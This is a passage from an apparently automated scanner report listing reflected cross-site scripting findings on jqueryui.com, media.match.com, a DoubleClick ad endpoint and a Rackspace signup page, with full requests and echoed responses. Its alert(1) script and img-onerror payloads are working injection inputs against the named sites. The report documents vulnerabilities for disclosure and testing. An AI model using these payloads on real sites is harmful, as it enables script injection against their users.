The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b66d"><script>alert(1)</script>623c2b48503 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305b66d"><script>alert(1)</script>623c2b48503&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40eb"><script>alert(1)</script>9eed84605e5 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30b40eb"><script>alert(1)</script>9eed84605e5&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e7eb"><script>alert(1)</script>0ffcdae2d95 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px9e7eb"><script>alert(1)</script>0ffcdae2d95&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 143e5"><script>alert(1)</script>b0bf9d965be was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/143e5"><script>alert(1)</script>b0bf9d965be HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:37 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:37 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:37 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4987 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... ?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/143e5"><script>alert(1)</script>b0bf9d965behttp://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119127_728x90"> ...[SNIP]...
The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84aee'-alert(1)-'c49b8f1b23a was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/84aee'-alert(1)-'c49b8f1b23a HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:38 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:38 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:38 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4928 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... 14_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&ml_multiclick=clickTAG1&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/84aee'-alert(1)-'c49b8f1b23ahttp://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90'); clickTAGs += '&swfPATH=' + escape('http://media.match.com/xl/PROD/1777 ...[SNIP]...
4.92. http://media.match.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://media.match.com
Path: /cookE/geoip/iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f6b"><script>alert(1)</script>f17304568b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&20f6b"><script>alert(1)</script>f17304568b2=1 HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:38 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:38 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:38 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4984 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&20f6b"><script>alert(1)</script>f17304568b2=1http://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90"> ...[SNIP]...
4.93. http://media.match.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://media.match.com
Path: /cookE/geoip/iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f94'-alert(1)-'1e9875c14ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&18f94'-alert(1)-'1e9875c14ba=1 HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:39 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:39 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:39 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4939 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... 4_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&ml_multiclick=clickTAG1&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&18f94'-alert(1)-'1e9875c14ba=1http://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90'); clickTAGs += '&swfPATH=' + escape('http://media.match.com/xl/PROD/17 ...[SNIP]...
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cbf1'%3balert(1)//38af7fabdfe was submitted in the target parameter. This input was echoed as 2cbf1';alert(1)//38af7fabdfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank2cbf1'%3balert(1)//38af7fabdfe&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/ HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:36 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:36 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:36 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4942 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... 11ew_vsgeo_selectgenderzipbkgd_vpblubtn_110810_noy_728x90.swf'; var flash_name= '"' + swf_name + '"'; var swfVer= 80/10; var swfMime= 'application/x-shockwave-flash'; var clickTAGs= 'clickTARGET=_blank2cbf1';alert(1)//38af7fabdfe' + '&clickTAG=' + escape('http://media.match.com/click.ng?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&ml_multi ...[SNIP]...
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4913e"><script>alert(1)</script>2aae3020d1a was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank4913e"><script>alert(1)</script>2aae3020d1a&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/ HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:36 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:36 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:36 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4987 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... <A TARGET="_blank4913e"><script>alert(1)</script>2aae3020d1a" HREF="http://media.match.com/click.ng?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&click=http://r.turn.com/r/f ...[SNIP]...
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload e774e<script>alert(1)</script>33aa020c94a was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1296921569996&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-5526064907005908&slotname=Technology_HomePage_237Top2e774e<script>alert(1)</script>33aa020c94a&page_slots=Technology_HomePage_237Top2&cust_params=Pageview%3DHomePage%26Permission%3DReg-regcom%26Flagged%3DNo%26Topic%3DTechnology%26WikiName%3Dhtcwiki%26UserRole%3DAnonymous%26ReturnVisitor%3Dfalse%26IsWPUser%3Dfalse%26AgeGroup%3D%26Gender%3D&cookie_enabled=1&ga_vid=1442931598.1296921570&ga_sid=1296921570&ga_hid=33117073&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&lmt=1296943170&dt=1296921570006&cc=12&biw=985&bih=996&ifi=1&adk=1893771767&channel=1000006000%2C1000001000%2C1000003000%2C1000003001%2C1000006001%2C1000006002%2C1000000118%2C1000001018%2C1000003019%2C1000006019&hints=technology%2C%20electronics%2C%20PC%2C%20laptop%2C%20cell%20phone%2C%20smart%20phone%2C%20PDA%2C%20new%20technology%2C%20technology%20news%2C%20wireless%20technology%2C%20&ad_type=text&u_tz=-360&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 16:02:06 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 1453
GA_googleSetAdContentsBySlotForSync({"Technology_HomePage_237Top2e774e<script>alert(1)</script>33aa020c94a":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
4.97. https://signup.rackspacecloud.com/signup [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://signup.rackspacecloud.com
Path: /signup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 833f8"><script>alert(1)</script>2f5afd2fed7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /signup?833f8"><script>alert(1)</script>2f5afd2fed7=1 HTTP/1.1 Host: signup.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Mosso Engineering) Content-Type: text/html; charset=utf-8 Date: Sat, 05 Feb 2011 15:25:22 GMT Keep-Alive: timeout=15, max=139 Connection: close Set-Cookie: symfony=3mbf46jt4ltiml2f8iqrbimlp5; path=/ X-Powered-By: PHP/5.2.6 Content-Length: 17282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8cc9a<img%20src%3da%20onerror%3dalert(1)>1b1cc5a4bc5 was submitted in the REST URL parameter 4. This input was echoed as 8cc9a<img src=a onerror=alert(1)>1b1cc5a4bc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
